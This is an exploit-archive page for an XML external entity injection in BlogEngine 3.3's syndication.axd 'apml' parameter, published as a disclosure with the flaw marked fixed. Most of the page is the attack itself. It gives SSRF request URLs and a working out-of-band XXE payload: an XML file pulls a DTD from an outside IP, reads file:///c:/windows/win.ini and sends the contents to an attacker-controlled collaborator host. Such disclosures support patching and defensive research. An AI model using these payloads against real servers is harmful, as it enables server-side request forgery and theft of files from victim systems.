Search for hundreds of thousands of exploits

"BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection"

Author

Exploit author

"Daniel Martinez Adan"

Platform

Exploit platform

xml

Release date

Exploit published date

2020-05-05

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
# Title: BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection
# Author: Daniel Martinez Adan (aDoN90)
# Date: 2020-05-01
# Homepage: https://blogengine.io/
# Software Link: https://blogengine.io/support/download/
# Affected Versions: 3.3
# Vulnerability: XML External Entity (XXE OOB) Injection Vulnerability
# Severity: High
# Status: Fixed
# Author: Daniel Martinez Adan (aDoN90)
# CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H

Technical Details
--------------------

Url: http://websiteurl-blogengine3.3/syndication.axd
Parameter Name: apml
Parameter Type: GET

*Attack Pattern 1 (SSRF HTTP Interaction) :*

http://websiteurl-blogengine3.3/syndication.axd?apml=http://hav4zt9bu9ihxzvcg59lqfapzg5it7.burpcollaborator.net

*Attack Pattern 2 (SSRF to XXE HTTP Interaction):*

http://b5baa301-b569-4bbf-afd9-d2eb264fdcbf.gdsdemo.com/blog/syndication.axd?apml=http://attackerip:8000/miau.txt

miau.txt

-----------------------------
  <!DOCTYPE foo SYSTEM "
">http://dgx2pxtwxkvgvkubo7ksvkywtnzhn6.burpcollaborator.net">
<http://dgx2pxtwxkvgvkubo7ksvkywtnzhn6.burpcollaborator.net>
-----------------------------
[image: image.png]

*Attack Pattern 3 (SSRF to XXE Exfiltration):*

miau.txt

-----------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://37.187.112.19:8000/test1.dtd">

%sp;
%param1;
%exfil;
]>
-----------------------------
test1.dtd

-----------------------------

<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM '
http://y76a7hgbrccuyclwxwcp3br74yayyn.burpcollaborator.net/?%data;'>">

-----------------------------
Release DateTitleTypePlatformAuthor
2020-05-05"BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection"webappsxml"Daniel Martinez Adan"
2019-10-16"CyberArk Password Vault 10.6 - Authentication Bypass"webappslinux"Daniel Martinez Adan"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48422/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.